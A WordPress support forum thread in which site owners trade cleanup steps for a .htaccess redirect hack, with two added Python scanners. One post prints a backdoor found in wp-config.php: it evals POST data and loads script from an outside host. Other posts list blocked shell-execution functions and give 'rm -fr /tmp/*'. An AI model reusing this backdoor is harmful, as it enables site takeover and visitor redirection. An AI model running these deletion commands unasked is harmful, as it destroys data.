3.3.1 Hacked by saveprefs.ru redirect (91 posts)

  1. impackt
    Member
    Posted 4 months ago #

    LOL, maybe my guardian angel fixed mine for me. I find it extremely weird that my solution didn't work for anyone else.

  2. UrbaanAlmelo
    Member
    Posted 4 months ago #

    @jamieedwards Yeah, I looked for it, but it's not on my server.

  3. UrbaanAlmelo
    Member
    Posted 4 months ago #

    @impackt Can I borrow your guardian angel, just for a night?

  4. UrbaanAlmelo
    Member
    Posted 4 months ago #

    I'm pretty sure by now that it's not an issue that I myself can resolve. In my FTP client I saw this popping up:

    [22:45:36] 211-Status of .htaccess:
    [22:45:36]  -r--r--r--   1 henkleurinknl psacln       3519 Jan 17 21:34 .htaccess

    henkleurinknl and psacln being websites of two other people - unfamiliar to me - who, not surprisingly, have also been compromised.

    The problem seems to be lying somewhere else. Which does nót comfort me.

  5. jamieedwards
    Member
    Posted 4 months ago #

    Hmmmm, after my last post I am not convinced... Patched timthumb.php, deleted all .htaccess files, and 20 minutes later they are all back :(

  6. Tehranshahr
    Member
    Posted 4 months ago #

    I have 3 1and1 accounts but only one of them has this problem, maybe the server is infected?

    The server ip address is 50.21.189.85, are you on the same server?

  7. Old_fart
    Member
    Posted 4 months ago #

    @pkwooster On FreeBSD based hosting there is an OS utility

    mtree

    that can calculate and later compare hashes of any directories/files. Linux based OSes need a third-party application called tripwire that does the same. Ask your provider what they have. It is better than a plugin because those programs have system-wide permissions 555 and can be hacked only if the attacker gains root privilege.

    @jamieedwards, the malicious script automatically searches everywhere beginning from the root directory. Take a look at what kind of information was taken:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    If you restrict dangerous functions in php.ini (and did restart the HTTP server after that) and you still continue to have the problem - try to delete everything in /tmp like that: rm -fr /tmp/*. Some systems may allow you read/write access to /var/tmp, so delete everything from there too. If you know other places where you have write permissions, take a look at those places too.
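    A baseline-and-compare check in the spirit of the mtree/tripwire suggestion above, as an added example that is not part of the post and not the output of either tool. It records a manifest (SHA-256, size, permission bits) of every regular file under a document root and later diffs a fresh manifest against it, so files that appear, disappear or change between runs (the .htaccess files this thread is about) are listed. It assumes the baseline is kept outside the web root; the sample tree in demo() is constructed.

```python
"""Baseline-and-compare file integrity check for a web root (added example).

Not code from the post or from mtree/tripwire: it imitates what they do by
recording a manifest of every file's hash, size and mode and diffing a later
manifest against it. All paths and sample files are constructed.
"""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def file_digest(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not fill memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict:
    """Walk root and record hash, size and permission bits for every regular file."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order gives stable reports
        for name in sorted(filenames):
            path = Path(dirpath) / name
            if path.is_symlink():
                continue  # symlink targets outside root are not ours to hash
            st = path.lstat()
            rel = path.relative_to(root).as_posix()
            manifest[rel] = {
                "sha256": file_digest(path),
                "size": st.st_size,
                "mode": format(stat.S_IMODE(st.st_mode), "04o"),
            }
    return manifest


def save_manifest(manifest: dict, out: Path) -> None:
    """Store the baseline outside the web root so a web-level compromise cannot edit it."""
    out.write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(src: Path) -> dict:
    return json.loads(src.read_text())


def compare_manifests(old: dict, new: dict) -> dict:
    """Report paths that were added, removed, or whose content or mode changed."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(
        rel for rel in set(old) & set(new)
        if old[rel]["sha256"] != new[rel]["sha256"] or old[rel]["mode"] != new[rel]["mode"]
    )
    return {"added": added, "removed": removed, "changed": changed}


def demo() -> dict:
    """Constructed scenario: take a baseline, then reproduce the thread's symptoms."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / ".htaccess").write_text("RewriteEngine On\n")
        (root / "wp-content" / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8constructed")
        baseline_file = Path(tmp) / "baseline.json"  # kept outside htdocs
        save_manifest(build_manifest(root), baseline_file)

        # Later run: a new .htaccess appeared in uploads, index.php was edited,
        # and photo.jpg gained an execute bit (constructed, benign content).
        (root / "wp-content" / "uploads" / ".htaccess").write_text("RewriteEngine On\n")
        (root / "index.php").write_text("<?php echo 'hello'; /* edited */ ?>\n")
        os.chmod(root / "wp-content" / "uploads" / "photo.jpg", 0o755)

        return compare_manifests(load_manifest(baseline_file), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

    Run it once right after a clean install to write the baseline, then again from cron; a non-empty "added" or "changed" list on a site nobody is editing is the signal that something is still writing to the account, which is the question this thread keeps circling back to.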

  8. jamieedwards
    Member
    Posted 4 months ago #

    look for an _cache.php file. The security guy said that was where all the .htaccess files were coming from. Mine was in /wp-content/uploads.

    I have just deleted this file, now I will remove the .htaccess files again and wait 30 minutes to see if that in fact got rid of the problem :/

    I'll keep you posted as I work on it.

  9. jamieedwards
    Member
    Posted 4 months ago #

    @Tehranshahr, no I seem to be on a different 1and1 server. All my sites are pinging to 74.208.210.66

  10. UrbaanAlmelo
    Member
    Posted 4 months ago #

    Don't wanna spoil the fun, but there's no _cache.php on my server.

  11. Tehranshahr
    Member
    Posted 4 months ago #

    @jamieedwards
    Ok, but it seems the problem is from the server. I'm testing a way to make sure that this problem is from the server, I'll post the result tomorrow.

  12. jamieedwards
    Member
    Posted 4 months ago #

    Ok, so it's been over an hour and a half now and it looks like I don't have any more infected .htaccess files showing up. There were a bunch of files that the security guy at 1and1 found that were corrupted, timthumb.php files that were in places I didn't know about such as some plugin folders, and also all of my /wp-includes/js/plupload/plupload.html4.js seemed to have been compromised on each of my sites. I deleted these files, and the _cache.php file (one of the files used to create the bogus .htaccess files), and also a whole bunch of random numbered files that were in a /wp-content/themes/mytheme/temp folder, one of them was called 7a7f9c188164e70ad99de9734ad7b524.php for instance, but they are all random numbers. I tell you all of this, but that wouldn't have stopped anything unless he shut down the shell sessions first; otherwise the connection to my files was still open, and they could have just uploaded more files. So you will need to do this, or get someone at your hosting company to do it for you.

    Now I am off to change all of my admin passwords once again just in case!

    Blessings to all of you, I pray you all get the solutions you need to get your sites back up and running quickly.
    Jamie

  13. wpv-expert
    Member
    Posted 4 months ago #

    Hello Everyone,

    Hacks by their very nature are insidious and cannot be second guessed in any way.

    I have seen code embedded in .gif files that were then extracted using base 64 to run the code pulled from the .gif file. How crazy is that?

    Here is the best way to fix issues for a hack that does not seem to have a particular clean cut resolution that anyone can follow. For your own sanity this is the most reliable way to be absolutely sure your hack is gone.

    You will need to ask your Host to open a new account and apply whatever money is left for hosting of the current (hacked) account to the new account.

    STEP 1
    Perform a new install of WordPress (latest version).

    STEP 2
    Make sure all re-installed plugins are freshly downloaded from their source and compatible with the latest version of WordPress.

    STEP 3
    Export your database from WordPress using the xml database export tool from WordPress.

    STEP 4
    Download all image content to your local drive to FTP up to the new account later.

    STEP 5
    Make sure you recreate all folders you may have had in the old site in the new site. Put all content in its respective place. Take extensive notes for each plugin as to their configuration, as well as all WordPress specific settings, i.e. anything you need to know before leaving the old site behind. Be very methodical in this step, otherwise you will create more work for yourself.

    STEP 6
    Import your database (previously exported) into the new WordPress site.
    Put all image content where it goes in its respective location/folders.

    If you made accurate notes and copied everything down from the old site, it will be nothing more than a logistical exercise.

    FINAL NOTE:
    Always make your website as secure as you can with best practices.
    Long passwords . . . changed every 6 months without fail. Including your FTP account p/w's.

    Install the Login lockdown plugin, WSD Security plugin and follow their instructions.

    Never leave the Default "Admin" account in place. Always create a new "Admin" account with the name Admin. Better yet do not use any word in any language for the user name. Make your User name and password 25 characters in length using all valid upper lower case as well as special characters accepted by WordPress.

    You are now equipped to weather the storm, and keep those passwords rotated out every six months if you have to schedule software to remind you to.

    Granted this is not fun if you have many sites like many people but it does work.

  14. mastercom
    Member
    Posted 4 months ago #

    Hello there,

    I have the same issue and I have been trying everything for 2 days now, but whatever I do the .htaccess files are rewritten :-(

    I can't locate the infected files in my wp-content... Do you have any tips to find them?

    thanks

  15. p-mt
    Member
    Posted 4 months ago #

    Hello,

    since yesterday night, unfortunately, I again found activities on my server. Again several w????????w.php scripts (e.g. w77688816w.php) are coming up. In addition, I found a script sm5ek3.php (http://pastebin.com/rekKbXJb), which probably is the one described here: http://www.webhackblog.com/2011/10/31/sm3-php-spam-script/

    I now decided, to be more radical. Steps I have done:

    - I deleted all older content which is not needed any more in DocumentRoot (made a backup before that with tar)
    - made a backup of all plugins (tar)
    - deleted all plugins (plan is to reinstall the needed ones later)
    - deleted all older themes (I only take the new ones coming with the fresh wordpress installation)
    - I followed old_fart recommendation to disable functions in php
    --- old-fart recommendation ---
    1. locate your php.ini file
    2. replace there
    disable_functions =
    to
    disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
    3. force to restart http server
    ---

    - find and afterwards delete malware files found by ...
    - ... find . -name "sm*.php" -print
    - ... find . -name "w?????????.php" -print

    - delete all .htaccess files with > find . -name ".htaccess" -exec rm {} \;

    - recreate my wp-config.php from scratch!!!!

    In the old one, I found this code, which probably isn't anything I like to have. Maybe this is the backdoor??:

    "<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
    "

  16. p-mt
    Member
    Posted 4 months ago #

    the above code is explained here: http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does

    This code is present also in most of the php-files of my theme!! I have to clean this up!

  17. p-mt
    Member
    Posted 4 months ago #

    with
    sudo grep -r turnitupnow * > badfiles.txt

    I found A LOT more of this!

  18. Peter Wooster
    Member
    Posted 4 months ago #

    One additional step to add to @wpv-expert's post:

    Be sure to check your development system for malware. One of the easiest entry points for this is a compromised Windows system. Key loggers and other similar malware allow the hacker to steal your FTP password.

    Never use a Windows PC for both casual surfing using IE and FTP to production sites. It's better to have an intermediary machine running Linux that you save your code to, test it and then upload it to the production server.

    /peter

  19. UrbaanAlmelo
    Member
    Posted 4 months ago #

    Looks like my problem was caused by another domain on the same server, that got hacked. Simply chmodding my root folder did the trick...

    It's always the hardest when a simple solution is right in front of you...

  20. bizarotrips
    Member
    Posted 4 months ago #

    Another one hacked with the same bad thing here :( 5 WordPress installations on one shared hosting account (iPage).
    It's been 2 days that I've been looking for a solution to this nasty hack.
    After reading many posts in various places and trying to find a solution, I finally think I managed to stop the .htaccess rewrite thing from happening every half an hour or so. This is what I did:

    1. The first thing I did was to download all my files from the server in a backup dir on my pc and to make database backups of the 5 WordPress installations on my server. There were 30000+ files, but it was worth the downloading.

    2. Next I ran a file search on my backup dir for the "_cache.php" file mentioned in many posts I read. It was found in only one WordPress installation in "/wp-content/uploads". I deleted it from the server.
    p.s. First I was using a basic FTP connection, but now I switched my settings to SFTP. I changed my password before that to a really strong one :) as it was mentioned that these attacks may be so successful due to weak FTP passwords.

    3. The next thing I did was to file search the backup dir for all "timthumb.php" instances. There were many in themes also in plugins (ubermenu, featured posts with thumbnails etc...).

    4. I deleted all unused themes and plugins and all instances of "timthumb.php".

    5. Reinstalled all 5 WordPress installations with fresh ones with the auto reinstall from the admin update menu.

    6. Deleted all ".htaccess" files from the five sites, replaced them with fresh ones and chmodded them to 444 (as "Tehranshahr" suggested here). I also included the 404 redirect code the user "impact" posted earlier here.

    Now it's been more than an hour and a half and the ".htaccess" rewrite thing seems to have stopped. I'm praying that this is it for now.

  21. j0hnnyb0y
    Member
    Posted 4 months ago #

    bizarotrips, which version of wordpress are you using? which plugins do you have installed?

    I work as a malware analyst and most WordPress hacks that I have seen are due to vulnerabilities within third-party plugins.

    In one particular instance the user had installed a plugin (latest version), but it hadn't been updated by the developer in months even after the vulnerability had been posted all over the net. :(

    Go over what you have installed, and search the net to determine if there are any exploits published for the plugins that you use.

    Also check out Better WP. It works pretty well when it comes to utilizing best practices in regards to WP security.

  22. j0hnnyb0y
    Member
    Posted 4 months ago #

    This was just brought to my attention...

    If you are at your wits' end trying to get your site back on track, these guys will do it for like 100 bucks or something like that.

    malfarmed.com

  23. bizarotrips
    Member
    Posted 4 months ago #

    UPDATE: My sites are up and running OK without any redirection in the ".htaccess" files since my last post. I'm almost sure that in my case it was the "timthumb.php" exploit that was used. @j0hnnyb0y all my WP installs are 3.3.1
    About the plugins... it's a more complicated thing, because I've installed so many plugins on one of my sites for research purposes that it's very hard for me to find out which one of them may have caused this vulnerability. As I posted before, I've downloaded all the files from my server directory (just 5 WordPress installs - 30000+ files) so I will have the time to check everything that could cause this s**t.
    I'm pretty sure that many of my files still contain some unwanted scripts injected, so I'm gonna investigate that further.

    p.s. the "http://sitecheck.sucuri.net" still gives me warnings for some of the files in my WP installs... One of them is "init2.php" which was in one of my thumbnail directories. This I connect again with the "timthumb.php" thing.

  24. jamieedwards
    Member
    Posted 4 months ago #

    I am now using this WP plugin "TimThumb Vulnerability Scanner" By Peter Butler on any new site or plugin I install. Seems to work ok, not sure it is updating the script properly, but at least it identifies any timthumbs that are out of date and not secure and I can update them manually.

  25. roro
    Member
    Posted 4 months ago #

    I was hacked too, they created 4 folders: lastnews, newsjournal, curretevents and breakingnews, each one with 100 names, each one with one .htaccess that redirected to a Russian site.

    Then they sent thousands of spam mails linking to those files. The only script I have on that domain is wordpress!

    I deleted the folders but they appeared later, so now I leave the folders there but I changed the permission so no one can access them.

    But I'm still worried, my server provider wants to know what happened, and I really don't know.

  26. j0hnnyb0y
    Member
    Posted 4 months ago #

    @roro what's your domain?

  27. Mr BaDr
    Member
    Posted 4 months ago #

    hey,
    where is the problem now, in the timthumb.php or in wp 3.3.1 ??
    thanks.

  28. jamieedwards
    Member
    Posted 4 months ago #

    Mr Badr, for me it was timthumb.php, and not 3.3.1. There is a plugin that I suggest you use called "TimThumb Vulnerability Scanner" By Peter Butler. It will scan all your files and tell you if you have a timthumb script that is open to attack.

    All the best,
    Jamie

  29. Roy
    Member
    Posted 4 months ago #

    This timthumb hack caused havoc about half a year ago. Apparently they found a new vulnerability or all of you didn't switch to better coded plugins after that havoc.

    http://wpcandy.com/reports/timthumb-security-vulnerability-discovered

    Badr, the last time there was a large-scale exploit of WordPress itself was years back. When you make sure always to have the latest WP, the things to look at for security are plugins, server settings, passwords, etc.

  30. Old_fart
    Member
    Posted 3 months ago #

    @p-mt, sorry for late response, was busy last week ...

    sudo grep -r turnitupnow * > badfiles.txt

    is good, but...

    Do you know that:
    1. PHP can be easily embedded in gif, jpg, png, mp3, wav... ?
    2. A lot of plugins after unpacking have executable rights on gif, jpg, png, txt files, which can be executed as CGI in this case?
    Always cure them with the help of

    find ./ -type d  -exec chmod -vv 755 {} \;
    find ./ -type f  -exec chmod -vv 644 {} \;

    3. A bunch of installations have 777 permissions on the whole wp-content folder instead of restricting it to "upload" only? (The best choice would be to remove ANY folders writable by the HTTP server outside DOCUMENT_ROOT, as it is possible to do with other CMSs, but changing it in WordPress is a challenge)
    4. Almost any HTTP server allows write permissions to /tmp, which is the most loveable place for any backdoors?
    5. Most servers have bash, gawk... base utilities which can be called by anyone and can be easily used as a backdoor channel (so no need to keep anything on servers cuz it's always available :) ), and any trace of activity will be logged on hosting?

    Well, there are a lot of scary things that are out of your control if you don't run your own server. Hackers rarely infect systems in the old-fashioned way. They usually keep spare ways to reactivate themselves after their visible stuff was detected and deleted. Spare ways could be anywhere: in database triggers, inside images or mp3 files (which actually are always exposed by WordPress to the world)... etc.

    To be sure that you take care of at least your part of the software, check ALL your files that are exposed by the HTTP server with these simple commands (change directory to the ROOT of what is HTTP accessible, aka DOCUMENT_ROOT):

    # Check if some files are trying to obfuscate themselves
    find . -type f -print0 | xargs -0 grep -i base64 > ../000-obfuscation.txt
    # Check for links to external sites
    # Especially pay attention if it is in php files
    find . -type f -print0 | xargs -0 grep -E '[[:alpha:]]+://[^/]*' > ../001-external_links_in_urls.txt
    # Review potentially malicious content
    find . -type f -print0 | xargs -0 grep -Ei 'iframe|src|javascript:|eval|include' > ../002-active_content.txt
    # Delete anything in the temporary folder that was created by your
    # account. (Don't worry that you may delete others' files:
    # /tmp has the sticky bit set on most servers, so you can not delete
    # files that were created by others)

    rm -fr /tmp/* ;

    Dump MySQL database so it will be possible to parse it as a single text file and search for the same keywords inside it.

    Well, there is no universal advice because of the different environments on servers, and the situation heavily depends on what type of plugins/themes you use (BTW, don't keep deactivated plugins/themes, since they are still callable from outside and if one finds a hole he/she will be able to use it).

    Best regards,
    Alex
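    The checks described in this post and in p-mt's grep for turnitupnow earlier in the thread, gathered into one scan as an added example (not the post's own commands, not part of WordPress or any plugin named here). It walks a document root and reports, per path: base64/eval obfuscation, eval of request data as in the wp-config.php snippet posted above, off-site <script src=...> tags, the redirect domains named in this thread, PHP tags hidden inside image or text files, execute bits on media files, world-writable directories and writable .htaccess files. The sample tree in demo() is constructed and inert: the suspicious text is kept inside a PHP string literal so nothing in it runs.

```python
"""Indicator and permission scan of a document root (added example).

Not the post's own commands and not part of WordPress or any tool named in
the thread. The indicator patterns come from the posts in this thread; the
sample tree built by demo() is constructed and inert.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Text indicators seen in the thread: base64 obfuscation, eval of request data,
# injected external script tags, and the redirect domains named in the posts.
INDICATORS = {
    "base64": re.compile(r"base64_decode\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "post_eval": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(.{0,120}?\$_(POST|GET|COOKIE|REQUEST)", re.I | re.S),
    "external_script": re.compile(r"<script[^>]+src=['\"]?https?://", re.I),
    "known_domain": re.compile(r"turnitupnow\.net|saveprefs\.ru", re.I),
}
# Files that should never carry PHP code or an execute bit.
MEDIA_EXT = {".gif", ".jpg", ".jpeg", ".png", ".txt", ".mp3", ".wav"}
PHP_TAG = re.compile(rb"<\?php|<\?=", re.I)


def audit_permissions(path: Path, st: os.stat_result) -> list:
    """Permission findings for one regular file."""
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if path.name == ".htaccess" and mode & 0o222:
        findings.append("htaccess_writable")  # the thread recommends chmod 444
    if path.suffix.lower() in MEDIA_EXT and mode & 0o111:
        findings.append("exec_bit_on_media")  # should be 644, never executable
    if mode & 0o002:
        findings.append("world_writable")
    return findings


def scan_file(path: Path, st: os.stat_result) -> list:
    """Permission plus content findings for one file, sorted and de-duplicated."""
    findings = audit_permissions(path, st)
    data = path.read_bytes()
    if path.suffix.lower() in MEDIA_EXT and PHP_TAG.search(data):
        findings.append("php_in_media")
    text = data.decode("utf-8", "replace")
    findings.extend(label for label, rx in INDICATORS.items() if rx.search(text))
    return sorted(set(findings))


def scan_root(root: Path) -> dict:
    """Map of relative path -> sorted findings; clean paths are omitted."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:  # the 777 wp-content habit the post warns about
            dpath = Path(dirpath) / d
            if not dpath.is_symlink() and stat.S_IMODE(dpath.lstat().st_mode) & 0o002:
                results[dpath.relative_to(root).as_posix() + "/"] = ["world_writable_dir"]
        for name in filenames:
            path = Path(dirpath) / name
            if path.is_symlink():
                continue
            findings = scan_file(path, path.lstat())
            if findings:
                results[path.relative_to(root).as_posix()] = findings
    return results


def demo() -> dict:
    """Constructed web root that triggers each finding; permissions set explicitly."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "mytheme"
        uploads = root / "wp-content" / "uploads"
        theme.mkdir(parents=True)
        uploads.mkdir(parents=True)
        for d in (root / "wp-content", root / "wp-content" / "themes", theme):
            os.chmod(d, 0o755)
        os.chmod(uploads, 0o777)
        files = {
            root / "index.php": b"<?php echo 'hi'; ?>\n",
            root / ".htaccess": b"RewriteEngine On\n",
            # constructed, inert: the pattern from the thread kept inside a string
            theme / "functions.php": b"<?php\n"
                b"$s = 'eval(base64_decode(str_replace(chr(32),chr(43),$_POST[\"showimg\"])))';\n",
            theme / "footer.php": b"<script src='http://turnitupnow.net/?rnd=1'></script>\n",
            uploads / "logo.gif": b"GIF89a<?php /* constructed */ ?>",
        }
        for path, body in files.items():
            path.write_bytes(body)
            os.chmod(path, 0o644)
        os.chmod(uploads / "logo.gif", 0o755)
        return scan_root(root)


if __name__ == "__main__":
    for rel, findings in sorted(demo().items()):
        print(f"{rel}: {', '.join(findings)}")
```

    Point scan_root() at DOCUMENT_ROOT and review the output the same way as the grep files the post writes to ../: every hit is something to read, not necessarily malware (legitimate plugins also call base64_decode), but a media file carrying a PHP tag or an execute bit, or a world-writable directory, has no honest explanation on a shared host. The same text checks can be run over a mysqldump file, which covers the post's last suggestion.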
